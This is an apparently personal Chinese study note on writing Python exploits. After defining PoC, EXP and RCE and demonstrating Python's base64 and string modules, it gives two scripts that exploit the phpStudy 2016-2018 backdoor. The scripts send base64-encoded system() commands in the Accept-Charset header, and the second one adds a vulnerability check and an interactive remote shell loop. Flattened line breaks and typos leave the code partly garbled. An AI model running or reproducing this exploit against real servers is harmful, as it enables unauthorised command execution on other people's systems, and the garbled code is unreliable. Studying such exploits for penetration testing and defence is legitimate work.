python 编写 phpstudy"/>
python 编写 phpstudy
注:个人笔记,非常简陋,仅供参考。
| 名词 | 解释 |
|---|---|
| POC (Proof of Concept) | 漏洞验证代码,验证漏洞的存在性。 |
| EXP (Exploit) | 渗透、攻击; 完整的漏洞利用工具 |
| RCE (Remote Code|Command Execute) | * 漏洞的类型 * 在远程目标上执行代码或命令 |
手工验证漏洞的问题:
- 效率
- 准确性
针对RCE 漏洞开发EXP,常见的RCE 漏洞:
- phpstudy_2016-2018_rce
- seacms_6.26-6.28_rce
- sangfor_edr_3.2.19_rce
- …
考虑将写好的EXP 集成到pocsuite3 框架中。
常见模块介绍
base64
base64 模块就是用来进行base64 编解码操作的模块。
base64 编码
直接利用模块中函数即可,注意使用二进制形式进行编码。
>>> import base64
>>> s = '''system("whoami");'''
>>> base64.b64encode(s.encode()) # .encode() 字符串转换成二进制数据
b'c3lzdGVtKCJ3aG9hbWkiKTs='
>>> base64.b64encode(s.encode()).decode()
'c3lzdGVtKCJ3aG9hbWkiKTs='
>>>
base64 解码
直接使用函数即可。
解码不需要转换成二进制
>>> import base64
>>> s = "c3lzdGVtKCJ3aG9hbWkiKTs="
>>> base64.b64decode(s)
b'system("whoami");'
>>> base64.b64decode(s).decode()
'system("whoami");'
>>>
string
字符集合模块。
>>> import string
>>> string.
string.Formatter( string.ascii_uppercase string.octdigits
string.Template( string.capwords( string.printable
string.ascii_letters string.digits string.punctuation
string.ascii_lowercase string.hexdigits string.whitespace
>>> string.printable # 可打印字符
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
>>> string.printable.strip()
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
>>>
常规EXP 编写
phpstudy_2016-2018_rce
漏洞利用脚本
# phpstudy_2016-2018_rce"""
GET /phpinfo.php HTTP/1.1
Host: 10.4.7.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept-Encoding: gzip,deflate
Accept-Charset: """import requests
import base64url = ".php"cmd = "net user"cmd = f"system('{cmd}');"cmd = base64.b64encode(cmd.encode()).decode()headers = {"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36","Accept-Encoding" : "gzip,deflate","Accept-Charset" : f"{cmd}"
}res = requests.get(url = url, headers = headers)html = res.content.decode("GBK") #windows系统对中文的编码就是GBK编码offset = html.find("<!DOCTYPE html")result = html[0:offset]print(result)
进阶脚本
- 漏洞存在性测试:无损;
- 循环执行命令。
# phpstudy_2016-2018_rceimport requests
import base64
import sys
import re
import random
import stringbanner = """
PHPStudy_2016-2018( ) ( ) ( ) | |_ _ _ ___ | |/') _| | _ _ _ __ | '_`\ /'_` ) /'___)| , < /'_` | /'_`\ /'_`\ ( '__)| |_) )( (_| |( (___ | |\`\ ( (_| |( (_) )( (_) )| | (_,__/'`\__,_)`\____)(_) (_)`\__,_)`\___/'`\___/'(_) - ZS
Usage: python3 *.py .php
"""def attack(cmd, url):cmd = f'''system("{cmd}");'''cmd = base64.b64encode(cmd.encode()).decode()headers = {"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36","Accept-Encoding" : "gzip,deflate","Accept-Charset" : f"{cmd}"}res = requests.get(url = url, headers = headers)html = res.content.decode()offset = html.find("<!DOCTYPE html")result = html[0:offset].strip()return resultdef gen_random_str(l):s = ""for i in range(l):is += random.choice(string.ascii_letters)return skdef verify(url):random_str = gen_random_str(32)cmd = f"echo {random_str}"if random_str in attack(cmd, url):return Trueelse:return Falseif len(sys.argv) < 2:print(banner)exit()url = sys.argv[1]print(f"Target: {url}")if not verify(url):print(f"The Target is NOT VULNERABLE!")exit()flag = input(f"The Target is VULNERABLE!\nCould you want to continue?[Y/n]")if flag == "n":exit()info = re.findall(r'http://(.*)/', url)[0]while True:cmd = input(f"<{info}> ")if cmd == "exit":breakprint(attack(cmd, url))
更多推荐
python 编写 phpstudy
发布评论